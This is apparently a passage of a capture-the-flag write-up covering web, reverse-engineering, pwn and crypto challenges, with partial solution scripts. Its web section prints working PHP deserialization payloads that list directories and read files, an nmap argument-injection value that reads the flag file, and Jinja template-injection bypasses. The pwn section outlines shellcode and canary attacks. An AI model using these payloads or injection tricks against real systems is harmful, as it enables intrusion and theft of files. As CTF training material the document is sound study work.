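The pollution survives the request: it lands on the User class object, so every hhh created afterwards (including the one the /flag route looks up) inherits it, which is why the writeup can register, then log in, then hit /flag.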
ez_php
Where is my goddess? Help me find her.
The source is in havefun.php.
First deserialize into the useless class's __destruct() to obtain key.php:
Wrap the object in an ArrayObject (C: custom serialization) to bypass /^[Oa]:[\d]+/i, use an md5 collision pair for QW/YXX, and rely on the low precedence of `and` (the assignment binds first) so that $random never matters:
C:11:"ArrayObject":196:{x:i:0;O:7:"useless":2:{s:2:"QW";s:64:"M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2";s:3:"YXX";s:64:"M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2";};m:a:0:{}}
Use basename() on $_SERVER['PHP_SELF'] to bypass the check:
/havefun.php/key.php?user=C:11:%22ArrayObject%22:196:{x:i:0;O:7:%22useless%22:2:{s:2:%22QW%22;s:64:%22M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2%22;s:3:%22YXX%22;s:64:%22M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2%22;};m:a:0:{}}&a=PHP_SELF
This returns an image whose message is key=9:
Finally, one more deserialization chain call:
1 | Me:__wakeup() (引用) |
phpinfo(); change reference 11 to 13:
C:11:%22ArrayObject%22:260:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Bs%3A7%3A%22phpinfo%22%3B%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A13%3B%7D;m:a:0:{}}
Change reference 16 to 18 and hez to her:
C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}
Final payload, listing the directory:
?user=C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}&file=data://text/plain,loveyou&fun=glob://f*
POST: ctf=DirectoryIterator
The flag file name turns out to be flag_my_baby.php.
Then read the flag file:
?user=C:11:%22ArrayObject%22:351:{x:i:0;O%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3BN%3Bs%3A8%3A%22%00her%00key%22%3BN%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BN%3Bs%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A18%3B%7D;m:a:0:{}}&file=data://text/plain,loveyou&fun=php://filter/convert.base64-encode/resource=flag_my_baby.php
POST: ctf=SplFileObject
base64-decode the result to get the flag.
scan_tool
nmap is so handy! No way, you still don't know how to use it?
Filtered: ? php flag iL oN
Read the file through nmap's -oA option, which saves the scan results in normal, XML and grepable formats at once, as .nmap, .xml and .gnmap files:
使用 ?ip=127.0.0.1' -i /fl""ag -oA 1 '
then fetch 1.nmap to get the flag.
klf_2
"Damn it, I don't believe it, I'm definitely not a klf, you are. Haha, this time I'm back, and you are surely the klf; I'll prove myself to the goddess..."
robots.txt
gives the route /secr3ttt; testing shows these keywords are filtered:
[ ] _ ' " \ config init globals os import request open read 0 137 pop
List the directory:
1 | {% set pp=dict(po=a,p=a)|join%} |
The flag file is fl4gfl4gfl4g; read it:
1 | {% set pp=dict(po=a,p=a)|join%} |
EZ_Smuggling
A simple site that converts H2 to H1; the admin thinks it is secure and that nobody can smuggle anything through it. Challenge link: https://47.108.56.168:20231/ Backup 1: https://47.108.56.168:20232/ Backup 2: https://47.108.56.168:20233/
H2.CL request smuggling: the front end downgrades HTTP/2 to HTTP/1.1 and the back end trusts the smuggled Content-Length. Reference:
HTTP Request Smuggling – HTTP/2 Downgrade Attack Part 2
Craft:
1 | GET / HTTP/2 |
to get the flag: SYC{http2_5muggl1ng_15_1nt3r3st1ng}.
klf_3
"Fine, fine, you solved all of those too. This time I asked pursue0h to collect your payloads from the previous rounds, so there is no way you can solve it; you are definitely the klf."
robots.txt
gives the route /secr3ttt; the same approach as klf_2 works.
List the directory:
1 | {% set pp=dict(po=a,p=a)|join%} |
The flag file is fl4gfl4gfl4g; read it:
1 | {% set pp=dict(po=a,p=a)|join%} |
Akane!
The challenge best suited to Mephisto.
glob:// stream-wrapper side channel to brute-force the file name character by character.
1 | from phpserialize import serialize |
1 | import requests |
Then visit /var/www/html/TheS4crEtF1AgFi1EByo2takuXX.php
to get the flag.
RE
shiftjmp
Where did it jump to?
IDA crashes while loading the binary, so use Ghidra instead:
1 | undefined8 main(void) |
The logic is a simple XOR; recover it:
1 | rodata = list(bytes.fromhex('5358417853366a6438646f547842517b78224d61276373452d7c456c2c6f2f7b5e5c')) |
点击就送的逆向题
How does code become an executable binary? (remember to wrap the correct string in SYC{}!!!!!!!)
Assemble and link the .s file: gcc xxx.s -o xxx
Key code:
1 | v7 = __readfsqword(0x28u); |
The logic is ROT7; CyberChef recovers SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF.
Flag: SYC{SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF}
easymath
Don't worry, you can do this without ever having taken linear algebra; I hear Mr. z3 is very capable. Wrap the flag in SYC{}.
The first part of the code is a matrix product over $\mathbb{Z}_{32}$: $L \cdot M = I$, i.e. $L$ is the inverse of the given matrix $M$ modulo 32.
The second part, worked out by testing its logic:
1 | flag = 'c01234_asdzxpoityumnbAOZWXGMY' |
The logic reorders the flag by the indices in num.
Recovery script:
1 | M = matrix(Zmod(32), [[18, 29, 16, 19, 27], [8, 31, 8, 23, 30], [29, 3, 28, 10, 21], [18, 29, 8, 16, 28], [11, 30, 7, 20, 7]]) |
flag:SYC{xtd4co_ymiunbbx3Aypsmbzii}
幸运数字
Try your luck today
Recover following the logic:
1 | data = [13, 7, 29, 37, 29, 110, 48, 57, 44, 63, |
听说cpp很难?
Master xxx overheard someone say C++ is hard. Really? No way. So Master X quickly wrote one to boost everyone's confidence.
Dynamic debugging gives the per-byte transform $c_i = [(9+1) \oplus (f_i+10)]-9-1$.
Brute-force each byte to recover:
1 | c = [77, 95, 61, -123, 55, 104, 115, 87, 39, 104, 81, 89, 127, 38, 107, 89, 115, 87, 85, 91, 89, 111, 106, 89, 39, 87, 114, 87, 79, 87, 120, 120, -125] |
flag:SYC{Anma1nG_y0u_maKe_it_1alaIa~~}
砍树
Do you know Android? I sure don't
Open the APK in jadx; the main logic lives in the native .so, viewed in IDA:
1 | _BOOL8 __fastcall Java_com_sky_ezreeeee_MainActivity_I0o0I(__int64 a1, __int64 a2, __int64 a3, __int64 a4) |
A simple XOR. Extract the ciphertext 002020171B360E362617042A2907261552332D0F3A271106330746173D0A3C382E2218 and the key Syclove; XORing them in CyberChef gives SYC{t@ke_thE_bul1_By_the_h0rns_TAT}.
flower-or-tea
Flower ?or tea? or flower tea?
Remove the jmp junk code by globally replacing 74 03 75 01 XX with 90 90 90 90 90 (NOP). The pair je +3 / jne +1 always skips the junk byte XX whatever the flags are, so all five bytes are dead and can be NOPed.
The pseudocode is a modified XTEA.
1 | from Crypto.Util.number import * |
mySelf
Why so serious?
Dynamic debugging shows the second transformation of the input is TEA.
1 | from Crypto.Util.number import * |
rainbow
美丽的IDA控制流视图 like Rainbow!
LLVM control-flow de-flattening:
python3 deflat.py -f ./rainbow --addr 0x401160
Then simply invert the logic:
1 | from Crypto.Util.number import * |
小黄鸭
The duck's key was stolen by a big bad duck called Piwai; can you help it find the key?
Python decompilation: extract 1.pyc and repair its header with the magic 550d0d0a, which is Python 3.8's (3.7 would be 420d0d0a), then recover the Python code.
Ciphertext: ~h|p4gs`gJdN`thPwR`jDn`te1w`2|RNH
CyberChef: ROT93 + Reverse + ROT12
gives SYC{1_h0pe_yOu_ChAse_YoUr_dr3a{s}
Fixing the last characters gives the flag: SYC{1_h0pe_yOu_ChAse_YoUr_dr3ams}
寻找初音未来
The right input rescues Miku~ (the image is a bit large, bear with it)
A Go program; the logic is RC4, and dynamic debugging gives key='C'*18.
Input prompt: what is Hatsune Miku's colour? (hexadecimal; for 0x123abc enter 123abc)
Answer: 39C5BB. Extract the ciphertext and RC4-decrypt:
1 | N = 256 |
浪漫至死不渝
A certain master wants to confess to his goddess. He built a website: click the heart and you can enter the password, but while writing it he accidentally deleted the hint password. Can you help him find the confession password? (Refresh when entering the password.) PS: wrap the password in SYC{} and change all letters to upper case.
Analyse the encryption logic in the JS file.
The key is Text1, stored rail-fence encrypted as 53X211WH04N; decrypt it with the site's own decryptRailFence() function:
decryptRailFence('53X211WH04N',3)='5201314WXHN'
Ciphertext: 125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99
Encryption logic:
1 | i<14 时:c[i]=(m[i]^k[i%7])+10 |
Plaintext recovery code:
1 | c = [125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99] |
flag:SYC{FJIAXUEFJIAXUEWXHN}
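As an added example (not the site's JavaScript), a rail-fence decryptor in Python, generic in the number of rails and checked against the key recovered above.

```python
# Added example, not the challenge's decryptRailFence(). A rail-fence cipher
# writes the plaintext in a zig-zag over `rails` rows and reads the rows out in
# order; decryption only needs the same zig-zag to know which plaintext index
# each ciphertext character came from.


def rail_pattern(length: int, rails: int) -> list:
    """Row index for every plaintext position: 0,1,...,rails-1,rails-2,...,0,1,..."""
    rows, row, step = [], 0, 1
    for _ in range(length):
        rows.append(row)
        if rails == 1:
            continue
        if row == 0:
            step = 1
        elif row == rails - 1:
            step = -1
        row += step
    return rows


def rail_fence_encrypt(plain: str, rails: int) -> str:
    rows = rail_pattern(len(plain), rails)
    return "".join(ch for r in range(rails) for ch, row in zip(plain, rows) if row == r)


def rail_fence_decrypt(cipher: str, rails: int) -> str:
    rows = rail_pattern(len(cipher), rails)
    # Plaintext positions in the order the encryptor emitted them (row by row, stable).
    order = sorted(range(len(cipher)), key=rows.__getitem__)
    plain = [""] * len(cipher)
    for ch, pos in zip(cipher, order):
        plain[pos] = ch
    return "".join(plain)


if __name__ == "__main__":
    key = rail_fence_decrypt("53X211WH04N", 3)
    print(key)                                    # the XOR key Text1 resolves to
    print(rail_fence_encrypt(key, 3) == "53X211WH04N")
```

With an unknown rail count the decryptor can simply be run for every count from 2 up to the length of the text; the readable output identifies the right one.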
AES! AES?
What’s this ?
Reverse it step by step following the logic.
1 | import math |
ezandroid
Hey! It's three o'clock already! Go have tea first! (wrap the flag in SYC{})
In MainActivity the logic is:
1 | obj padded to 24 bytes with X |
The encryption is a modified TEA:
1 | from Crypto.Util.number import * |
Signed decryption:
In MainActivity2 the logic is:
1 | iArr=[-107, -106, -95, -115, -119, 127, 26, 121, -62, -20, 86, 9] = '9596a18d897f1a79c2ec5609' |
Combining both parts gives the flag: SYC{T00nV3tD3F34Tint0vict0rY}
是男人就来扎针
A simple game-reversing giveaway; remember to wrap the flag in SYC{}
Decompile with ILSpy; the logic is in public class GameManager.
1 | magicc = [75, 109, 102, 63, 107, 112, 63, 108, 124, 112, |
flag:SYC{CBDDD133B60130856D3C695D9E5ED6A5}
PWN
nc_pwntools
1 | from pwn import * |
password
Probabilistic getshell.
1 | from pwn import * |
ret2text
PIE is enabled; probabilistic getshell.
1 | from pwn import * |
write1
Overwrite the return address byte by byte with the address of the backdoor function backdoor(); two bytes are enough.
1 | from pwn import * |
ret2libc
(code to be added)
ezpwn
Do this one first, it's simple
(code to be added)
write2
Stack address leak and an executable stack: write shellcode that fits in 24 bytes, use the while loop to rewrite retaddr to the stack address, ret2shellcode.
1 | from pwn import * |
fmt1.0
(code to be added)
white_canary
Before attacking remotely, sync your clock with "sudo ntpdate cn.pool.ntp.org"
init() implements its own canary computation, and syscall 59 is disabled, so execve is not available.
Compute the canary from the seeded pseudo-random generator (hence the clock sync), write an ORW shellcode, ret2shellcode.
1 | from pwn import * |
ez_fullprotection
scanf leaks the _start address to defeat PIE; an overflow on a thread stack overwrites the canary stored in TLS.
1 | from pwn import * |
CRYPTO
SignIn
Bibo…Hello! 你好! こんにちは! Привет! 5359437b48656c6c6f5f576f726c645f43727970746f5f6269626f6269626f7d… Hmm… Something goes wrong with my greetings bot.
Hex to ASCII: SYC{Hello_World_Crypto_bibobibo}.
proof_of_work
题目链接:nc 59.110.20.54:5526 Build your own function to solve proof_of_work!
PoW solver:
1 | from pwn import * |
SimpleRSA
So simple RSA! Wait… Are you kidding me? https://en.wikipedia.org/wiki/RSA_(cryptosystem) hint: flag<p
import gmpy2
from Crypto.Util.number import *
flag = b"SYC{Al3XEI_FAKE_FLAG}"
assert len(flag) == 35
p,q = [getPrime(2048) for _ in "__"]
n = p*q
e = 65537
c = gmpy2.powmod(bytes_to_long(flag),e,n)
print(p)
print(c)
#24724324630507415330944861660078769085865178656494256140070836181271808964994457686409910764936630391300708451701526900994412268365698217113884698394658886249353179639767806926527103624836198494439742123128823109527320850165486500517304731554371680236789357527395416607541627295126502440202040826686102479225702795427693781581584928770373613126894936500089282093366117940069743670997994742595407158340397268147325612840109162997306902492023078425623839297511182053658542877738887677835528624045235391227122453939459585542485427063193993069301141720316104612551340923656979591045138487394366671477460626997125944456537
#510345661718450375632304764819724223824018609359964259503762283253350010161515190912152623604019093266967095847334388281390406831587663253164256543905694021952211220652820225527413861208452760215767828927039893435528572148282529198773772864255061213208279999011194952146362748485103032149806538140693537361755210176698895104708379400806511907719904867068865970241208806615061055047254026118016836750283966478103987375361826198930529462261013324904522014804502582865716441828895047550041401172127129749969507853355531197814919603963664646220505672302543085959372679395717892060245461464861507164276442140407308832537707450729432224150754603518526288767105682399190438680085925078051459448618725871249563011864525585870188123725554411655044152994826056900502298772802133526591794328224932405680583757307064395792317383571866619582974377344736930271554160701478385763426091091686496788999588340419226785217028504684542197970387916262126278955278523452903043316452825738030645100271595942652498852506660789605846309602343932245435421425673058238785509280366229754404949219663043627431437755087855502139890639468481922788973821783957766433857773771229298328019250652625289700950165414584983487319078090573179470893450632419467111117341472
Since $p$ is printed and the hint guarantees $\text{flag} < p$, reduce modulo $p$ alone: $c \equiv m^e \pmod p$, so with $d = e^{-1} \bmod (p-1)$ we get $m = (c \bmod p)^d \bmod p$. $q$ is never needed; note the inverse is taken modulo $p-1$, not modulo $p$.
1 | e = 65537 |
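As an added example (not the writeup's script), the reduction in Python: P_PAGE and C_PAGE are the two numbers printed at the end of the challenge source, and the routine is first exercised on a constructed, deliberately tiny key.

```python
from math import gcd

# Added example, not the writeup's script. The challenge prints p and promises
# flag < p, so q is never needed: c = m^e mod pq implies c mod p = m^e mod p,
# and by Fermat d = e^-1 mod (p-1) inverts that exponent modulo p.
# P_PAGE and C_PAGE are the two numbers printed at the end of the challenge source.

E = 65537


def decrypt_mod_p(c: int, p: int, e: int = E) -> bytes:
    """Recover m from c = m^e mod (p*q) given p, assuming m < p."""
    if gcd(e, p - 1) != 1:
        raise ValueError("e is not invertible modulo p-1")
    d = pow(e, -1, p - 1)            # Python 3.8+ modular inverse
    m = pow(c % p, d, p)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


# Self-check on a constructed, deliberately tiny key: two Mersenne primes.
P_DEMO, Q_DEMO = 2**127 - 1, 2**89 - 1
M_DEMO = b"SYC{demo_flag}"


def demo_roundtrip() -> bytes:
    c = pow(int.from_bytes(M_DEMO, "big"), E, P_DEMO * Q_DEMO)
    return decrypt_mod_p(c, P_DEMO)


P_PAGE = 24724324630507415330944861660078769085865178656494256140070836181271808964994457686409910764936630391300708451701526900994412268365698217113884698394658886249353179639767806926527103624836198494439742123128823109527320850165486500517304731554371680236789357527395416607541627295126502440202040826686102479225702795427693781581584928770373613126894936500089282093366117940069743670997994742595407158340397268147325612840109162997306902492023078425623839297511182053658542877738887677835528624045235391227122453939459585542485427063193993069301141720316104612551340923656979591045138487394366671477460626997125944456537
C_PAGE = 510345661718450375632304764819724223824018609359964259503762283253350010161515190912152623604019093266967095847334388281390406831587663253164256543905694021952211220652820225527413861208452760215767828927039893435528572148282529198773772864255061213208279999011194952146362748485103032149806538140693537361755210176698895104708379400806511907719904867068865970241208806615061055047254026118016836750283966478103987375361826198930529462261013324904522014804502582865716441828895047550041401172127129749969507853355531197814919603963664646220505672302543085959372679395717892060245461464861507164276442140407308832537707450729432224150754603518526288767105682399190438680085925078051459448618725871249563011864525585870188123725554411655044152994826056900502298772802133526591794328224932405680583757307064395792317383571866619582974377344736930271554160701478385763426091091686496788999588340419226785217028504684542197970387916262126278955278523452903043316452825738030645100271595942652498852506660789605846309602343932245435421425673058238785509280366229754404949219663043627431437755087855502139890639468481922788973821783957766433857773771229298328019250652625289700950165414584983487319078090573179470893450632419467111117341472


def solve_page() -> bytes:
    return decrypt_mod_p(C_PAGE, P_PAGE)


if __name__ == "__main__":
    print(demo_roundtrip())
    print(solve_page())
```

The only precondition is the one the hint gives: the plaintext must be smaller than $p$, otherwise $c \bmod p$ only determines $m \bmod p$ and the full message would need $q$ as well.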
OTPTwice
I invented a new symmetric cryptosystem, and I believe you will never break it!
from pwn import xor
from os import urandom
flag = b"SYC{Al3XEI_FAKE_FLAG}"
# step0: key generation & distribution
def s0(msg):
k1,k2 = [urandom(len(msg)) for _ in "__"]
return k1,k2
#
# step1: Alice encrypt M, and send it to Bob
def s1(msg,k1):
c1 = xor(msg,k1)
return c1
# step2: Bob encrypt c1, and send it to Alice
def s2(msg,k2):
c2 = xor(msg,k2)
return c2
# step3: Alice decrypt c2, and send it to Bob.
def s3(msg,k1):
c3 = xor(msg,k1)
return c3
# step4: Bob decrypt c3, get M.
def s4(msg,k2):
m_ = xor(msg,k2)
return m_
def encrypt(msg,k1,k2):
c1 = s1(msg,k1)
c2 = s2(c1,k2)
c3 = s3(c2,k1)
m_ = s4(c3,k2)
assert msg == m_
# Here's what hacker Eve got:
def encrypt_(msg,k1,k2):
c1 = s1(msg,k1)
c2 = s2(c1,k2)
c3 = s3(c2,k1)
m_ = s4(c3,k2)
if HACK == True:
print(c1)
print(c2)
print(c3)
k1,k2 = s0(flag)
encrypt_(flag,k1,k2)
'''
b'\xdbi\xab\x8d\xfb0\xd3\xfe!\xf8Xpy\x80w\x8c\x87\xb9'
b'o\xb0%\xfb\xdb\x0e\r\x04\xde\xd1\x9a\x08w\xda4\x0f\x0cR'
b'\xe7\x80\xcd\ria\xb2\xca\x89\x1a\x9d;|#3\xf7\xbb\x96'
'''
Derivation: $c_1 = m \oplus k_1$, $c_2 = m \oplus k_1 \oplus k_2$, $c_3 = m \oplus k_2$, so $c_1 \oplus c_2 = k_2$, $c_2 \oplus c_3 = k_1$ and $m = c_1 \oplus c_2 \oplus c_3$. Because XOR commutes and cancels, the three passes leak both pads and the message to anyone watching the wire.
1 | from Crypto.Util.strxor import strxor |
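As an added example (not the challenge's script), the exchange modelled end to end in Python, with Eve's recovery run over the three captured values printed above.

```python
from os import urandom

# Added example, not the challenge's own script. Models the exchange above
# (Alice and Bob each own a one-time pad; three messages cross the wire) and
# what an eavesdropper who sees all three computes. C1_PAGE..C3_PAGE are the
# three captured values printed at the end of the challenge.


def xor(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("pads must match the message length")
    return bytes(x ^ y for x, y in zip(a, b))


def three_pass(msg: bytes, k1: bytes, k2: bytes):
    """(c1, c2, c3) exactly as s1..s3 produce them; Bob then recovers msg = c3 ^ k2."""
    c1 = xor(msg, k1)      # Alice -> Bob:   m ^ k1
    c2 = xor(c1, k2)       # Bob -> Alice:   m ^ k1 ^ k2
    c3 = xor(c2, k1)       # Alice -> Bob:   m ^ k2
    return c1, c2, c3


def eve(c1: bytes, c2: bytes, c3: bytes):
    """XOR is its own inverse and commutative, so the three passes cancel:
    c1 ^ c2 = k2, c2 ^ c3 = k1, c1 ^ c2 ^ c3 = m. Returns (m, k1, k2)."""
    k2 = xor(c1, c2)
    k1 = xor(c2, c3)
    m = xor(xor(c1, c2), c3)
    return m, k1, k2


C1_PAGE = b'\xdbi\xab\x8d\xfb0\xd3\xfe!\xf8Xpy\x80w\x8c\x87\xb9'
C2_PAGE = b'o\xb0%\xfb\xdb\x0e\r\x04\xde\xd1\x9a\x08w\xda4\x0f\x0cR'
C3_PAGE = b'\xe7\x80\xcd\ria\xb2\xca\x89\x1a\x9d;|#3\xf7\xbb\x96'


def solve_page() -> bytes:
    return eve(C1_PAGE, C2_PAGE, C3_PAGE)[0]


if __name__ == "__main__":
    msg = b"hello, Bob"
    k1, k2 = urandom(len(msg)), urandom(len(msg))
    c1, c2, c3 = three_pass(msg, k1, k2)
    print(xor(c3, k2) == msg)                 # Bob's view
    print(eve(c1, c2, c3) == (msg, k1, k2))   # Eve's view: everything
    print(solve_page())
```

Each pad on its own is a perfectly fine one-time pad; the protocol fails because the same pad is applied twice in a scheme where the layers commute, so the second application undoes the first for the eavesdropper just as it does for the legitimate party.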
OldAlgorithm
An old algorithm but widely used nowadays.
from Crypto.Util.number import *
import os
flag = b"SYC{Al3XEI_FAKE_FLAG}"
pad = lambda msg,padlen: msg+os.urandom(padlen-len(msg))
flag = pad(flag,32)
print(len(flag))
p = [getPrime(16) for _ in range(32)]
c = [bytes_to_long(flag)%i for i in p]
print('p=',p)
print('c=',c)
'''
p= [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333]
c= [36086, 4005, 3350, 23179, 34246, 5145, 32490, 16348, 13001, 13628, 7742, 46317, 50824, 23718, 32995, 7640, 10590, 46897, 39245, 16633, 31488, 36547, 42136, 52782, 31929, 34747, 29026, 18748, 6634, 9700, 8126, 5197]
'''
CRT: the padded flag is 32 bytes (256 bits) and the 32 residues are taken modulo distinct 16-bit primes whose product is about 512 bits, so the Chinese Remainder Theorem recovers it exactly.
1 | p = [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333] |
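As an added example (not the writeup's script), an incremental CRT in Python run over the p= and c= lists printed above.

```python
# Added example, not the writeup's script. The 32-byte padded flag x is only
# known through x mod p_i for 32 distinct 16-bit primes; their product is about
# 512 bits, so the Chinese Remainder Theorem pins x down uniquely (x < 2^256).
# P_PAGE and C_PAGE are the p= and c= lists printed by the challenge.


def crt(residues, moduli) -> int:
    """Smallest x >= 0 with x ≡ r_i (mod m_i) for pairwise coprime m_i (incremental form)."""
    x, big_m = 0, 1
    for r, m in zip(residues, moduli):
        t = ((r - x) * pow(big_m, -1, m)) % m   # adjust x so it also fits the next modulus
        x += t * big_m
        big_m *= m
    return x


P_PAGE = [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333]
C_PAGE = [36086, 4005, 3350, 23179, 34246, 5145, 32490, 16348, 13001, 13628, 7742, 46317, 50824, 23718, 32995, 7640, 10590, 46897, 39245, 16633, 31488, 36547, 42136, 52782, 31929, 34747, 29026, 18748, 6634, 9700, 8126, 5197]


def solve_page() -> bytes:
    x = crt(C_PAGE, P_PAGE)
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(crt([2, 3, 2], [3, 5, 7]))   # 23
    print(solve_page())
```

The random padding bytes come back along with the flag, which is why the result is decoded as raw bytes rather than text; the first 21 bytes are the flag itself.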
easy_classic
A proper matryoshka; it makes my classical ciphers spin
Each layer's answer is the password of the next layer's zip archive.
Layer 1: udzeojxuwqcu, ROT10, gives enjoythegame
Layer 2: ialhhooavtepcyr, rail fence with 7, gives ilovecryptohaha
Layer 3: 5a6H5a6Z5LiH5rOV55qE6YKj5Liq5rqQ5aS0, base64, gives 宇宙万法的那个源头 (the source of all dharmas in the universe)
Layer 4: 熊曰:呋食食食取噗山笨笨破嗄咯哈動嗡雜類嗒嘿啽沒歡破吖咬我啽寶盜噔咯沒, "Bear says" (熊曰) decoding, gives never gonna give you up
Layer 5: password: adltlfltqrcy, key: 👝👘👠👩👞👘👤👜
Base100 first gives key=fairgame, then Playfair gives genshinstart
flag:SYC{classical_1s_fun}
PolyRSA
Harder RSA. Check it out!
import gmpy2
from Crypto.Util.number import *
flag = b"SYC{Al3XEI_FAKE_FLAG}"
p,q = [getPrime(2048) for _ in "__"]
e1,e2 = [getPrime(17) for _ in "__"]
e = 65537
n = p*q
c1 = gmpy2.powmod(2*p + 3*q,e1,n)
c2 = gmpy2.powmod(5*p + 7*q,e2,n)
c = gmpy2.powmod(bytes_to_long(flag),e,n)
print("e1=",e1)
print("e2=",e2)
print("c1=",c1)
print("c2=",c2)
print("c=",c)
print("n=",n)
#e1= 113717
#e2= 80737
#c1= 9752839882829413894537101840577724372595711227261446623800540905734288442513221476122853724984413486548114863653413402553510662484095774075395010018097860713233310980655400996937839283595254455226968555353965682707034953245815675896532247796914107372017316595834104315956092883630417213661092902312363898156083618324595446104116780257420632312967196543604004735825084717893043677324980096919201674968409588258074955901464794213576175775029228120587624156659781351745280393349621899575590534407020304779789364039937262735125454234277257653352482043596547988162033836683832665259910231101988452890348131069076783241758460033498745883510857632211155394704573314383641931342749588801935232320900029282556698686377036602332675511693178801813843289832314805998046340756743141772494048423633508269602682110562782611790173069568096745571043430727050119025803300447115699301730144380337202900481783431775659744419514602463016482084120057517911229590202014104009035048676403863325787100389938634000444064251619084208646223755971513063120504604181993165696290463036712141426391117904190514051640277136860362